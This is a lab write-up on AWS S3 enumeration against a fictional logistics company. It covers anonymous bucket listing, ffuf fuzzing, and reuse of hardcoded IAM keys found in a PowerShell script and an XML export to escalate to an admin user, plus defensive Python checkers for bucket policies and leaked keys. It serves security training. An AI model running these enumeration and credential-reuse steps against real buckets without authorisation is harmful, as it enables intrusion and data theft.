# AWS S3 Enumeration Basics

#### Lab prerequisites

* Basic Linux command line knowledge

#### Scenario

It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.

<figure><img src="/files/QXBMiF3yDlteyY51o14K" alt=""><figcaption></figcaption></figure>

* Visiting the given URL, it appears to be a logistics site. The site is static: clicking around the navigation did nothing.

<figure><img src="/files/rfz9QI1juumdau1cncCe" alt=""><figcaption></figcaption></figure>

Using Wappalyzer or whatweb in Kali Linux we can see it is hosted on [Amazon S3](https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html).

* Using Wappalyzer

<figure><img src="/files/DFu2G4U9DC8KT1MU0Vn2" alt=""><figcaption></figcaption></figure>

* Using the whatweb terminal utility in Linux

```
whatweb http://dev.huge-logistics.com/
```

<figure><img src="/files/x4pETuD9v03DEamgIzzP" alt=""><figcaption></figcaption></figure>

Checking out the source code of the website, we found that the picture is also hosted on **AWS**.

<figure><img src="/files/YQGjy5u1hmZ7WuZh5Ld4" alt=""><figcaption></figcaption></figure>

* Navigating to the S3 URL and removing the trailing file name, in the hope that directory listing is allowed, but no luck.

```
https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css
https://s3.amazonaws.com/dev.huge-logistics.com/static
```

* Fuzzing

```
ffuf -u https://s3.amazonaws.com/dev.huge-logistics.com/FUZZ/ -w /usr/share/wordlists/dirb/common.txt -ic -ac
```

<figure><img src="/files/4fkW9a7VZ9DVzf599Apu" alt=""><figcaption></figcaption></figure>

* Manually checked the endpoints; nothing interesting, mostly 403s.
* We can try listing the S3 bucket contents using the AWS CLI.

```
aws s3 ls s3://dev.huge-logistics.com --no-sign-request
```

<figure><img src="/files/EPBhaQ1tdZYKELK43xfR" alt=""><figcaption></figcaption></figure>

WOW, the bucket is **publicly listable** even without authentication (`--no-sign-request` sends the request unsigned, i.e. as an anonymous caller).
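From the defender's side, the listing above succeeds because some grant makes `s3:ListBucket` available to anonymous principals. The following is an added example, not code from the lab: a static check over a bucket policy document (the JSON shape `aws s3api get-bucket-policy` returns) that flags Allow statements open to everyone, with a constructed weak policy beside a hardened one. The bucket name is the lab's; the role ARN and account ID `123456789012` in the hardened policy are placeholders.

```python
"""Flag S3 bucket policy statements that allow anonymous listing or reading.

Added example, not code from the lab. The two policies are constructed for
illustration; the bucket name is the lab's, the role ARN and account ID in
the hardened policy are placeholders.
"""
import fnmatch
import json

# Anonymous grants of these actions are what make `aws s3 ls --no-sign-request`
# and unauthenticated downloads succeed.
LIST_ACTIONS = ("s3:ListBucket", "s3:ListBucketVersions")
READ_ACTIONS = ("s3:GetObject", "s3:GetObjectVersion")


def _as_list(value):
    """Policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True when Principal is "*" or {"AWS": "*"}, i.e. any caller, signed or not."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def _covers(action_patterns, wanted):
    """Does any action pattern ("s3:*", "s3:Get*", "*") match one of the wanted actions?"""
    return any(fnmatch.fnmatchcase(w, p) for p in action_patterns for w in wanted)


def find_public_statements(policy_json):
    """Return (Sid, kind) pairs for Allow statements open to everyone.

    kind is "list" (anonymous ListBucket) or "read" (anonymous GetObject).
    Statements carrying a Condition are skipped: keys such as aws:SourceVpce
    usually narrow the audience, so they need a manual look rather than a flag.
    """
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue
        actions = _as_list(stmt.get("Action"))
        sid = stmt.get("Sid", "<no Sid>")
        if _covers(actions, LIST_ACTIONS):
            findings.append((sid, "list"))
        if _covers(actions, READ_ACTIONS):
            findings.append((sid, "read"))
    return findings


# Constructed: the kind of policy that produces the behaviour seen in the lab.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicList", "Effect": "Allow", "Principal": "*",
         "Action": "s3:ListBucket",
         "Resource": "arn:aws:s3:::dev.huge-logistics.com"},
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::dev.huge-logistics.com/*"},
    ],
})

# Constructed: same bucket, access limited to one deployment role (placeholder
# account 123456789012) and unencrypted transport denied.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "DeployRoleOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/WebDeploy"},
         "Action": ["s3:ListBucket", "s3:GetObject", "s3:PutObject"],
         "Resource": ["arn:aws:s3:::dev.huge-logistics.com",
                      "arn:aws:s3:::dev.huge-logistics.com/*"]},
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*",
         "Resource": ["arn:aws:s3:::dev.huge-logistics.com",
                      "arn:aws:s3:::dev.huge-logistics.com/*"],
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
})

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, find_public_statements(doc) or "no anonymous access")
```

Two caveats when using this on real buckets: S3 Block Public Access at the account or bucket level overrides public statements like `PublicList`, so a flagged policy is only exploitable when that setting is off, and the check reads only the policy, not the bucket ACL, which can grant listing on its own.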

* Trying to list recursively, it turned out that we don't have enough permissions for that operation.

```
aws s3 ls s3://dev.huge-logistics.com/ --no-sign-request --recursive
```

<figure><img src="/files/VBnRoSq6vWQoo8wAFz5D" alt=""><figcaption></figcaption></figure>

It seems that we don't have enough permissions over either the admin or the migration-files directory.

But I was able to download the index.html.

<figure><img src="/files/dMCwQZycxj89MOoIWk4i" alt=""><figcaption></figcaption></figure>

Looking at `index.html`, it's the same page as the website.

```
html2text index.html
```

<figure><img src="/files/WJ1d2SWgAiyasKwKep5d" alt=""><figcaption></figcaption></figure>

* At first glance, I missed appending the `/` at the end of `shared`. After correcting that, I was able to list the contents of the `shared/` directory.
* It turns out that the bucket allows access to this folder, and it contains a ZIP file that looks interesting.

```
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
```

<figure><img src="/files/vaWbqO5D38puC72bpnUR" alt=""><figcaption></figcaption></figure>

* After downloading and unzipping the file, I found a PowerShell script:

```
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
```

<figure><img src="/files/vQcWzY2W1OgeQH8usumD" alt=""><figcaption></figcaption></figure>

```
└─$ unzip hl_migration_project.zip
Archive:  hl_migration_project.zip
  inflating: migrate_secrets.ps1
  inflating: __MACOSX/._migrate_secrets.ps1
```

The archive contains:

* `migrate_secrets.ps1`

Upon inspecting the PowerShell script, I discovered hardcoded AWS credentials (something every pentester loves):

<figure><img src="/files/B4scteSttVgr2lh292VB" alt=""><figcaption></figcaption></figure>

* Trying to understand the script: it uses these credentials to authenticate to AWS and upload secrets, then waits for all jobs to finish.

Now we can use `aws configure` to authenticate; it will prompt for the access key ID and secret access key.

```
aws configure
```

<figure><img src="/files/RMujlqSPaPVWQNEpSYpS" alt=""><figcaption></figcaption></figure>

* Verify the user. The command below returns details about the **currently authenticated identity**.

```
aws sts get-caller-identity
```

<figure><img src="/files/AFDZfq0Nloagk3kZqZ9z" alt=""><figcaption></figcaption></figure>

⇒ The **UserId** is the internal unique ID for the IAM user (not usually important for us).

⇒ **Account:** the AWS account ID the credentials belong to; 794929857501 identifies the **entire AWS environment**.

**⇒** [**Arn**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html): the full identity path in AWS

* `iam` → Identity and Access Management service
* `794929857501` → AWS account ID
* `user/pam-test` → IAM user name you are acting as
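The ARN breakdown above follows the general `arn:partition:service:region:account-id:resource` layout, which is worth parsing properly when `get-caller-identity` output is logged or checked automatically. The following is an added example, not code from the lab: a parser for that layout (it handles the `type/name` and `type:name` resource forms, assumed-role sessions and the account root, not only the IAM user case shown above) plus a one-line summary of a caller-identity response. The sample response is constructed around the lab's account ID and user name; the `UserId` value is a placeholder.

```python
"""Parse the Arn from `aws sts get-caller-identity` into its components.

Added example, not code from the lab. ARNs follow
arn:partition:service:region:account-id:resource, where resource is
"type/name", "type:name" or a bare name; IAM ARNs leave region empty.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Arn:
    partition: str      # "aws", "aws-cn", "aws-us-gov"
    service: str        # "iam", "sts", "s3", ...
    region: str         # empty for global services such as IAM
    account: str        # 12-digit account ID (empty in S3 ARNs)
    resource_type: str  # "user", "role", "assumed-role"; bucket name for S3 objects
    resource_id: str    # "pam-test", "RoleName/Session", object key, ...


def parse_arn(arn):
    """Split an ARN string; raises ValueError on anything that is not one."""
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    _, partition, service, region, account, resource = parts
    # "/" is tried first: IAM uses user/Name, role/Name, assumed-role/Role/Session;
    # ":" covers services such as Lambda (function:Name).
    for sep in ("/", ":"):
        if sep in resource:
            rtype, rid = resource.split(sep, 1)
            return Arn(partition, service, region, account, rtype, rid)
    return Arn(partition, service, region, account, "", resource)


def describe_identity(identity):
    """One-line summary of a get-caller-identity response (a dict)."""
    arn = parse_arn(identity["Arn"])
    if arn.service == "iam" and arn.resource_id == "root":
        who = "account root user"
    elif arn.resource_type == "assumed-role":
        role, _, session = arn.resource_id.partition("/")
        who = f"role {role} (session {session})"
    else:
        who = f"IAM {arn.resource_type} {arn.resource_id}"
    return f"{who} in account {identity['Account']}"


# Constructed sample of the CLI's JSON output; UserId is a placeholder.
SAMPLE_IDENTITY = {
    "UserId": "AIDAEXAMPLEPLACEHOLDER",
    "Account": "794929857501",
    "Arn": "arn:aws:iam::794929857501:user/pam-test",
}

if __name__ == "__main__":
    print(parse_arn(SAMPLE_IDENTITY["Arn"]))
    print(describe_identity(SAMPLE_IDENTITY))
```

Run stand-alone it prints the parsed dataclass and `IAM user pam-test in account 794929857501`; in an audit script the same summary makes it obvious when a set of recovered credentials belongs to a different account than expected or to the account root.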

So now we're authenticated as the IAM user **`pam-test`**.

Remember we didn't have permission to list `/admin/` and `/migration-files/`; let's try again now that we are authenticated as `pam-test`.

* We can now list `/admin/` but cannot download its contents.

<figure><img src="/files/hcO5knYAKmIwHkgd3EIY" alt=""><figcaption></figcaption></figure>

Listing migration-files, there is an XML file that stands out, plus two PDFs.

```
aws s3 ls s3://dev.huge-logistics.com/migration-files/
```

<figure><img src="/files/wgZXwwEU85M0xAu00Iqr" alt=""><figcaption></figcaption></figure>

```
aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .
```

* Copied the test-export.xml file; opening it, a lot of things stand out.
* Again, the juiciest creds I found are **hardcoded AWS production credentials**.

<figure><img src="/files/iubhtpRBYO4CWzmWbOuL" alt=""><figcaption></figcaption></figure>
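Both finds in this lab, the credentials in `migrate_secrets.ps1` and the production pair in `test-export.xml`, have the same shape: an access key ID next to a 40-character secret. The following is an added example, not code from the lab: a small scanner for that shape that a team could run as a pre-commit or CI check before scripts and exports land in a bucket. Both sample inputs are constructed in the style of the lab's files and use AWS's documented example key pair (`AKIAIOSFODNN7EXAMPLE` / `wJalrXUtnFEMI/K7MDENG/bPxRfiCyEXAMPLEKEY`), not live credentials.

```python
"""Find hardcoded AWS credentials in files before they reach a bucket or a repo.

Added example, not code from the lab. The samples are constructed and use
AWS's documented example key pair rather than real credentials.
"""
import re

# Access key IDs are 20 characters: AKIA (long-term IAM user key) or
# ASIA (temporary STS key) followed by 16 uppercase letters or digits.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[A-Z0-9]{16})\b")

# Secret keys are 40 characters of [A-Za-z0-9/+]. Any 40-char token would be
# noisy (git hashes are 40 too), so require a credential-looking name before it:
# a variable assignment, a JSON/YAML key, or an XML element.
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws_?secret_?access_?key|secretaccesskey|secret_?key)"
    r"""\s*[=:>]\s*["']?([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"""
)


def scan_text(text, name="<input>"):
    """Return (name, line_no, kind, value) tuples; secret values are redacted."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((name, no, "access_key_id", m.group(1)))
        for m in SECRET_KEY_RE.finditer(line):
            s = m.group(1)
            # Never copy the full secret into a report or log line.
            findings.append((name, no, "secret_access_key", s[:4] + "..." + s[-4:]))
    return findings


def scan_files(paths):
    """Scan files on disk; returns the combined findings list."""
    findings = []
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings.extend(scan_text(fh.read(), path))
    return findings


# Constructed sample in the style of the lab's migrate_secrets.ps1.
PS1_SAMPLE = """\
# constructed sample in the style of migrate_secrets.ps1
$commit = "0123456789abcdef0123456789abcdef01234567"
$env:AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
$env:AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCyEXAMPLEKEY"
Set-AWSCredential -AccessKey $env:AWS_ACCESS_KEY_ID -SecretKey $env:AWS_SECRET_ACCESS_KEY
"""

# Constructed sample in the style of the lab's test-export.xml.
XML_SAMPLE = """\
<!-- constructed sample in the style of test-export.xml -->
<credentials env="production">
  <AccessKeyId>AKIAIOSFODNN7EXAMPLE</AccessKeyId>
  <SecretAccessKey>wJalrXUtnFEMI/K7MDENG/bPxRfiCyEXAMPLEKEY</SecretAccessKey>
</credentials>
"""

if __name__ == "__main__":
    import sys
    hits = scan_text(PS1_SAMPLE, "migrate_secrets.ps1") + scan_text(XML_SAMPLE, "test-export.xml")
    for name, no, kind, value in hits:
        print(f"{name}:{no}: {kind} {value}")
    sys.exit(1 if hits else 0)
```

The `$commit` line in the PowerShell sample is there on purpose: it is a 40-character token that the name filter keeps out of the results, which is the trade-off the secret regex makes between recall and noise. Pass file paths to `scan_files` to run it over a checkout; a non-zero exit is what a CI step keys on.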

Again, using the hardcoded creds.

```
aws configure
```

```
aws sts get-caller-identity
```

<figure><img src="/files/tscXTV1ezVTiRchmo8Y2" alt=""><figcaption></figcaption></figure>

This confirmed authentication as the IAM user `it-admin`; we now have higher privileges than the previously observed `pam-test` user (more resource access).

⇒ With the elevated IAM identity, access to restricted S3 objects became available. The contents of the `/admin/` directory were successfully listed:

```
└─$ aws s3 ls s3://dev.huge-logistics.com/admin/
flag.txt
website_transactions_export.csv
```

```
aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt .
```

<figure><img src="/files/7T86HHBBOFk1XclwTlfc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/J0Dk41s8nnLHipy9N17W" alt=""><figcaption></figcaption></figure>

#### Knowledge Gained from This Lab

* Public S3 bucket exposure
* Sensitive migration files containing IAM credentials
* Credentials in files leading to IAM privilege escalation
* Unauthorized access to restricted S3 objects

